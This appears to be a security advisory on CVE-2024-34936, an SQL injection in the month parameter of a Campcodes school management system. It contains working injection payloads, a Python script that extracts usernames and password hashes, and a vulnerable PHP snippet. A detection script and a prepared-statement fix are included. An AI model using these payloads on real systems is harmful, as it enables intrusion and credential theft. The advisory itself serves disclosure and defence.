CVE-2024-34936 is a critical SQL injection vulnerability discovered in the popular Campcodes Complete Web-Based School Management System version 1.. The flaw exists in the /view/event1.php script, where the month parameter gets passed directly to an SQL query without proper sanitization or escaping. This allows unauthenticated attackers to inject arbitrary SQL commands into the database.
If exploited, this vulnerability can lead to data theft, gaining administrative access, or even a complete system compromise.
The vulnerability is triggered by the following request:
GET /view/event1.php?month=<inject_here>
Specifically, the code in event1.php looks something like this (illustrative example):
<?php
// ... some code above
$month = $_GET['month'];
$sql = "SELECT * FROM events WHERE month='$month'"; // No escaping!
$result = mysqli_query($conn, $sql);
// ... process/display events ...
?>
There is no filtering or escaping for the $month variable, making this endpoint vulnerable.
1. Classic SQL Injection PoC
To check for SQL injection, an attacker can try injecting SQL metacharacters via the month parameter. Here’s an example payload to test for error-based injection:
/view/event1.php?month=1'%20OR%201=1--%20
This payload closes the string and injects an OR condition that always evaluates to true, returning all events, regardless of the real month.
2. Dumping Usernames via UNION
Suppose the database table users exists with a username column. An attacker could use UNION to dump usernames:
/view/event1.php?month=1'+UNION+SELECT+1,username,3,4+FROM+users--+
Depending on the number of columns, the attacker may adjust the payload. If the events table has four columns, this works. The page may display usernames instead of real event data.
Here’s how you can automate exploitation with a simple Python script:
import requests

url = 'http://target-site/view/event1.php'
# The UNION payload from section 2; requests URL-encodes it for us
payload = "1' UNION SELECT 1,username,password,4 FROM users-- "
params = {'month': payload}
r = requests.get(url, params=params)
print(r.text)  # If vulnerable, you may see usernames and password hashes
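The payloads in sections 1 and 2 leave a clear trace in the web server access log. The following detection script is an added example (not part of the original advisory or the Campcodes project); it assumes combined-format access logs and uses constructed sample lines, flagging any request to /view/event1.php whose month value is not simply a number from 1 to 12.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache/nginx "combined" format); not from any real server.
SAMPLE_LOG = """\
203.0.113.10 - - [23/May/2024:18:01:02 +0000] "GET /view/event1.php?month=5 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
203.0.113.10 - - [23/May/2024:18:01:09 +0000] "GET /view/event1.php?month=1'%20OR%201=1--%20 HTTP/1.1" 200 9811 "-" "Mozilla/5.0"
198.51.100.7 - - [23/May/2024:18:02:44 +0000] "GET /view/event1.php?month=1'+UNION+SELECT+1,username,3,4+FROM+users--+ HTTP/1.1" 200 5230 "-" "python-requests/2.31"
198.51.100.7 - - [23/May/2024:18:03:01 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The application only ever needs a month number, so anything else is anomalous (allow-list check).
VALID_MONTH = re.compile(r'^(0?[1-9]|1[0-2])$')
# Crude SQL-metacharacter heuristics, consulted only after the allow-list check has already failed.
SQLI_HINTS = re.compile(r"('|--|\bunion\b|\bselect\b|\bor\b\s+\d+=\d+)", re.IGNORECASE)


def classify_request(line):
    """Return (ip, decoded month value, reason) for a suspicious event1.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if parts.path != '/view/event1.php':
        return None
    # parse_qs decodes %XX and '+' once, the same way PHP populates $_GET.
    month = parse_qs(parts.query, keep_blank_values=True).get('month', [''])[0]
    if VALID_MONTH.match(month):
        return None
    reason = 'sql-metacharacters' if SQLI_HINTS.search(month) else 'non-numeric-month'
    return (m.group('ip'), month, reason)


def scan_log(text):
    """Run classify_request over every line and keep only the hits."""
    return [hit for hit in (classify_request(l) for l in text.splitlines()) if hit]


if __name__ == '__main__':
    for ip, month, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} {reason}: month={month!r}")
```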
How to Fix
- Use parameterized/prepared SQL statements.
Here’s a safe code example:
<?php
// $conn is an open mysqli connection established earlier in the application
$month = $_GET['month'] ?? '';
$stmt = $conn->prepare("SELECT * FROM events WHERE month=?");
if ($stmt === false) {
    die('Database error');
}
$stmt->bind_param("s", $month); // the value travels separately from the query text, so it can never alter the SQL
$stmt->execute();
$result = $stmt->get_result();
// ... process/display events ...
?>
References
- CVE Details Entry for CVE-2024-34936
- Campcodes Complete Web-Based School Management System 1.
Conclusion
CVE-2024-34936 is a dangerous and easy-to-exploit SQL injection in a widely used PHP school management system. If you run this software, update or patch immediately. If you are a developer, follow secure coding best practices to avoid simple but severe vulnerabilities.
Timeline
Published on: 05/23/2024 17:15:30 UTC
Last modified on: 08/07/2024 21:35:05 UTC